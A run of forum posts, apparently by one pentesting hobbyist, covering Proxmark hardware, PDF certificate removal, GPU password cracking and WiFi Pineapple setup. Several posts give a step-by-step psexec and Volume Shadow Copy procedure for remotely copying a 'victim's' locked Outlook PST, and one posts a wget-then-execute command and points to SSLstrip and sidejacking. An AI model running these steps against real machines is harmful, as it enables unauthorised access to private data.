0xFFFF

Ladies and Gentlemen, I would like to direct your attention to our Proxmark3 Rdv40 Kickstarter! If any of you are in to contact or contactless card security research, I strongly recommend you check this out. We are already funded and production is waiting on the green light. The team (including myself) have years of experience in the industry and believe we have produced the best proxmark available on the market. The public repo is here - https://github.com/Proxmark/proxmark3 The popular iceman fork is here - https://github.com/iceman1001/proxmark3

Hi all, Is anyone familiar with invalidating PDF certificates / removing document security? I have a number of documents which require an installed certificate (which I have) and a password for said certificate. Is there a way to remove this from a PDF? I don't have the public key. I have tried invalidating the certificate using some perl script magic but the document permissions still prevent me from clearing and removing the invalid certificate.

...Ok. I'm raising this one from the dead. This topic hasn't been one of those super important projects, hence the really late post. The best method (IMO) is to use VSC. So far it's worked on all the machines I've tested. In situations where programs are missing, I've simply copied them or used the -c option in psexec.exe. Don't forget you need to authenticate either using psexec or when opening the command prompt. Step 1. Get Admin access using SAM or whatever. Step 2. Remote to victim psexec \\remotemachine.somedomain.com cmd Step 3. See if VSC is working vssadmin list shadows If it is, make a note of the desired VSC and skip to Step 5. Step 4. Create a VSC vssadmin create shadow /for=C: Go back to Step 3. Step 5. Mount the desired VSC mklink /d "C:\VSCmountpoint" \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyXXX\ Where VSCmountpoint is a folder anywhere on the system and HarddiskVolumeShadowCopyXXX is the VSC you want to mount. Step 6. Copy stuff xcopy / copy / whatever the file wherever you want. Step 7. Unmount VSC rmdir C:\VSCmountpoint Step 8. Eat pizza. Questions?

I'd suggest steering away from Prolific devices. I've had trouble with them in the past. FTDI is great but expensive. Silicon Labs is a cheap alternative.

I like the SMS idea. For some of those cases it would be ideal. Any ideas on how to configure this? Is there a simple method of sending SMSs from BackTrack using an android attached device? There are cases where I like using cloud services but I have some hefty hardware at home which does the job nicely most of the time.

Hi All, I bumped in to a big problem the other day when it all of a sudden occurred to me that I have no processing power while I'm out on the move. Normally I would connect to home where I have some heavy hardware to do pass cracking etc… but I’m not always in a situation where I can do this. I use a modified 1015PX eeePC to get the job done while I’m on the move but it does not have an express port. The USB ports are 2.0 and the only solution I’ve found thus far is this… http://www.asus.com/Graphics_Cards/External_Graphics_Card/XG_Station/#specifications …and this… http://hackaday.com/2011/10/19/beefing-up-your-laptops-gaming-chops-with-an-external-gpu/ What does everyone else do when they are pen-testing out in the field and need extra grunt for pass cracking / number crunching stuff? Regards, -0xFFFF

Hi Morfir, Keep at it! The challenge is what makes it fun! Start by converting the 'code' to ASCII, then you'll find that working out the solution becomes more obvious. I found a signature that led me to the answer. Answer: Pr0t3ct!on#cyber_security@12*12.2011+

What about session handeling in PHP?

Not sure if anyone is interested in this but I've made progress. Most are probably already familiar with PsExec. What I've done is used that to silently create a VSC of the the PST on demand which can then be 'restored' and copied or moved from the victims machine. The process will take time due to the size of the PST. I've been working with ~700MB - 1.4GB files.

Have you tried wp3.sh yet? If not try it first. Open up a terminal and throw this at it: wget wifipineapple.com/wp3.sh; chmod +x wp3.sh; ./wp3.sh; firefox http://172.16.42.1/pineapple & This should've been on the instructions supplied with the pineapple. If you didn't get a copy of the guide you can access it here - http://wifipineapple.com/doku.php?id=quick_start_guide

+1 for EEE. One of my machines is a 1005HA running BT5r1.

In my experience I have had a little difficulty duplicating files that are locked by other processes. One method I've used is to forcably release the file and then commence copying. This option is ok but often causes the process to crash. The other method I've used is volume shadow copy. This method is ok if the service is enabled and you don't want the latest changes. Both options have major disadvantages and I was wondering if anyone might have a better method? The target in my test scenario has been the users outlook PST.

I left my pIII running for 6 hours yesterday and I noticed the same thing. I don't think it is of any real concern. Maybe it might be worthwhile looking at a heatsink mod? I'm assuming you were using the AC adaptor?

if the mkIII is anything like mobile phones, computers or TVs or..., give it around a year and the hardware will be discontinued and a new version will come out thats about to be discontinued and then ......... I attempted to purchase a MK II but they sold out. Fortunately the MK III poped out and I picked that up instead. It's just the average life cycle of technology these days.

No that isn't the case all. You have control over what content is served to the victim. Have a look at "SideJacking" and "SSLstrip". :)